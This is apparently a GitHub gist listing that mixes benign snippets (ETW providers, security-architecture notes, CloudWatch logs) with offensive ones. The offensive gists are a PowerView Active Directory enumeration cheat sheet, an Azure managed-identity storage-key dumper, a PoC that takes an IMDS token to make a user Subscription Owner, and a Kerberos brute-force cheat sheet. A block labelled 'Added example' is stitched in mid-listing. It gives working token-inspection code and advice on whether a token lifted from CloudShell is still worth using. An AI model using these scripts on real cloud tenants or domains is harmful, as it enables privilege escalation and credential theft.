@BigFoxses
BigFoxses / Get-EtwTraceProvider.ps1
Created January 14, 2023 09:49 — forked from guitarrapc/Get-EtwTraceProvider.ps1
ETW (Event Tracing for Windows) Providers and their GUIDs for Windows 10 x64
#Requires -RunAsAdministrator
#Requires -Version 5.0
# Requires Windows 10 (Get-EtwTraceProvider comes from the EventTracingManagement module).
# Each row is a (trace session, provider GUID) pair for a provider currently enabled in that session.
Get-EtwTraceProvider | Select-Object SessionName, Guid | Sort-Object SessionName
# Same data rendered as a Markdown table
<#
#Requires -RunAsAdministrator
$result = Get-EtwTraceProvider | Sort-Object SessionName
$result | ForEach-Object -Begin { "|SessionName|GUID|"; "|-----------|----|" } -Process { "|$($_.SessionName)|$($_.Guid)|" }
#>
BigFoxses / Enterprise Security Architecture Note.md
Created January 10, 2023 10:18 — forked from mylamour/Enterprise Security Architecture Note.md
Generated automatically from Enterprise Security Architecture.pdf

1. The Meaning of Security

1.1. The Cultural Legacy: Business Prevention

  • Security has a bad reputation for getting in the way of real business
  • This reputation has developed because of the way security professionals have practised
  • We need an accurate definition of what we mean by ‘security’
  • A technical definition of security may not be helpful
  • Security can be defined only relative to the value and risk propositions of the business

1.2. Measuring and Prioritising Business Risk

  • Risk is a combination of asset value, business impact, threat and vulnerability
  • Risk management is a combination of risk assessment and ‘risk mitigation’
BigFoxses / PowerView-3.0.ps1
Created December 9, 2022 11:43 — forked from macostag/PowerView-3.0.ps1
PowerView 3.0 Cheat Sheets.
###################################
# Domain Enumeration
###################################
# Get SID for the current domain.
Get-DomainSID
# Get object of another domain.
Get-Domain -Domain domain.local
# Get domain controllers for the current/specified domain.
BigFoxses / windowsnetworking.bat
Created November 18, 2022 12:50 — forked from tuksik/windowsnetworking.bat
Windows - Firewall / PortForwarding / Network
:: ------------------ NETSH ---------------
::
:: for help: netsh /?
:: NETSTAT
::
:: useful: list connections and listening ports with the owning executable (-b needs an elevated prompt)
netstat -bn
BigFoxses / get-MIStorageKeys.ps1
Created November 1, 2022 02:48 — forked from kfosaaen/get-MIStorageKeys.ps1
A PowerShell function to call Azure rest APIs using a VM Managed Identity to list available Storage Account access keys
Function get-MIStorageKeys{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts)
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
BigFoxses / MI-Owner-Escalation.ps1
Created November 1, 2022 02:42 — forked from kfosaaen/MI-Owner-Escalation.ps1
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
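Added example for the two managed-identity gists above (written for this listing, not part of kfosaaen's code): before spending an IMDS-issued ARM token on `get-MIStorageKeys` or the owner-escalation PoC, decode its payload and check which identity it represents and how long it is valid. The IMDS call is the same one the PoC uses; the sample token, its claim values and the `New-SampleJwt` helper are constructed here so the inspection runs offline. Decoding the payload is not signature validation, it only reads the claims the token carries; the `xms_mirid` claim is what managed-identity tokens use in practice to name the VM or user-assigned identity.

```powershell
# Added example, not from the forked gists. Inspect the claims of an IMDS-issued ARM token.

function ConvertFrom-Base64Url {
    param([Parameter(Mandatory)][string]$Text)
    # JWT segments are base64url: no padding, '-' and '_' instead of '+' and '/'.
    $s = $Text.Replace('-', '+').Replace('_', '/')
    switch ($s.Length % 4) {
        1 { throw "Invalid base64url length" }
        2 { $s += '==' }
        3 { $s += '=' }
    }
    return [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))
}

function ConvertFrom-JwtPayload {
    param([Parameter(Mandatory)][string]$Token)
    $parts = $Token.Split('.')
    if ($parts.Count -ne 3) { throw "Not a JWT: expected 3 segments, got $($parts.Count)" }
    # Only the middle segment (claims) is decoded; the signature is NOT checked here.
    return (ConvertFrom-Base64Url $parts[1]) | ConvertFrom-Json
}

function Get-ImdsArmToken {
    # Same IMDS request as the PoC above; only answers from inside an Azure VM with a managed identity.
    $uri = 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'
    $r = Invoke-WebRequest -Uri $uri -Method GET -Headers @{ Metadata = 'true' } -UseBasicParsing
    return ($r.Content | ConvertFrom-Json).access_token
}

function Show-ManagedIdentityToken {
    param([Parameter(Mandatory)][string]$Token)
    $c   = ConvertFrom-JwtPayload $Token
    $exp = [DateTimeOffset]::FromUnixTimeSeconds([int64]$c.exp).UtcDateTime
    $idType = if ($c.xms_mirid) { 'ManagedIdentity' } else { 'Other' }
    [pscustomobject]@{
        Audience     = $c.aud        # expect https://management.azure.com/ for an ARM token
        TenantId     = $c.tid
        ObjectId     = $c.oid        # service principal object id; this is what RBAC assignments bind to
        AppId        = $c.appid
        IdentityType = $idType
        ResourceId   = $c.xms_mirid  # ARM id of the VM (system-assigned) or the user-assigned identity
        ExpiresUtc   = $exp
        MinutesLeft  = [math]::Round(($exp - (Get-Date).ToUniversalTime()).TotalMinutes)
    }
}

function New-SampleJwt {
    # Constructed sample token: made-up claim values and a fake signature, for offline use only.
    $enc = {
        param($o)
        $json = $o | ConvertTo-Json -Compress
        [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($json)).TrimEnd('=').Replace('+', '-').Replace('/', '_')
    }
    $header  = @{ alg = 'RS256'; typ = 'JWT' }
    $payload = @{
        aud       = 'https://management.azure.com/'
        tid       = '00000000-0000-0000-0000-000000000001'
        oid       = '11111111-1111-1111-1111-111111111111'
        appid     = '22222222-2222-2222-2222-222222222222'
        xms_mirid = '/subscriptions/00000000-0000-0000-0000-000000000002/resourceGroups/rg-demo/providers/Microsoft.Compute/virtualMachines/vm01'
        exp       = [DateTimeOffset]::UtcNow.AddHours(1).ToUnixTimeSeconds()
    }
    return "$(& $enc $header).$(& $enc $payload).c2lnbmF0dXJl"
}

# Usage: offline, inspect the constructed sample. On an Azure VM, swap in (Get-ImdsArmToken).
Show-ManagedIdentityToken -Token (New-SampleJwt) | Format-List
```

The `ObjectId` is the value to look up in the subscription's role assignments (`Get-AzRoleAssignment -ObjectId ...`) to learn what the identity can already do before trying to add an Owner; `MinutesLeft` tells you whether a token lifted from CloudShell or an Automation account is still worth using.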
BigFoxses / PowerView-3.0-tricks.ps1
Created October 2, 2022 12:39 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
BigFoxses / get_cloudwatch_logs.py
Created September 20, 2022 13:11 — forked from eldondevcg/get_cloudwatch_logs.py
Pull down cloudwatch logs with boto
# IF YOU INCUR HUGE COSTS WITH THIS OR IT BREAKS DON'T BLAME ME License
# This is a throw-away script I wrote to pull the json events for all of the streams from a cloudwatch log
# For some reason, the naive way to do vpc network logging does logging to different streams in a cloudwatch
# log based on interface.
# Great for diagnosing lots of things, and generating verbose logs, but for the broad-stroke analysis I was doing,
# all I really wanted was the basic data. This would have been easier if I had logged to s3, but I did not see a
# way to do that in 2 clicks.
group_name = 'CHANGEME'
BigFoxses / kerberos_attacks_cheatsheet.md
Created June 23, 2022 13:14 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: